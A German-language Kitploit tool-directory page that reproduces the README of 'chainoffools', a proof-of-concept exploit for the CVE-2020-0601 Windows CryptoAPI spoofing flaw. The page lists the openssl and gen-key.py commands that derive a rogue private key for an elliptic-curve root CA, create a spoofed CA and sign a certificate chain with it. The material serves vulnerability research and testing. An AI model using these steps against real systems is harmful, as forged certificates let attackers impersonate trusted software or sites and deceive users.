Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
chainoffools — Proof-of-Concept-Exploit für die CVE-2020-0601 Windows-CryptoAPI-Spoofing-Schwachstelle, der die Erzeugung gefälschter CA-Zertifikate durch Manipulation von Elliptic-Curve-Schlüsseln demonstriert. | Kitploit
Tools/GitHubGitHub/kudelskisecurity/chainoffools
SchwachstellenanalyseCode-AnalyseExploitationKryptographiePenetrationstests
GitHubkudelskisecurity/chainoffools

chainoffools

Proof-of-Concept-Exploit für die CVE-2020-0601 Windows-CryptoAPI-Spoofing-Schwachstelle, der die Erzeugung gefälschter CA-Zertifikate durch Manipulation von Elliptic-Curve-Schlüsseln demonstriert.

Repository anzeigen
335812vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CryptoAPI

CVE-2020-0601: Ausnutzung der Windows CryptoAPI-Spoofing-Sicherheitslücke. Weitere Informationen in unserem Blogbeitrag.

Installationsanforderungen

root@kitploit:~
pip install -U -r requirements.txt

Die Zertifikatserstellung funktioniert mit OpenSSL-Version bis zu 1.0.2u.

CA-Zertifikat

Wir haben die USERTrust ECC Certification Authority verwendet, aber es kann jedes root-Zertifikat sein, das auf der P-384-Kurve funktioniert.

Um einen privaten Schlüssel zu generieren, der mit dem öffentlichen Schlüssel des root-Zertifikats übereinstimmt, haben wir das Skript gen-key.py verwendet (funktioniert mit Python 3.6 und höher):

root@kitploit:~
$ ./gen-key.py RootCert.pem 

Der Schlüssel kann angezeigt werden mit:

root@kitploit:~
$ openssl ec -in p384-key-rogue.pem -text

Dann, um die rogue CA zu generieren:

root@kitploit:~
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500

Dann generieren wir den folgenden privaten Schlüssel und das folgende Zertifikat:

root@kitploit:~
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf 

Schließlich, um die vollständige Kette in einer Datei zu erhalten, verketten wir das CA- und das Server-Zertifikat:

root@kitploit:~
cat client-cert.pem ca-rogue.pem > cert.pem
Tool herunterladen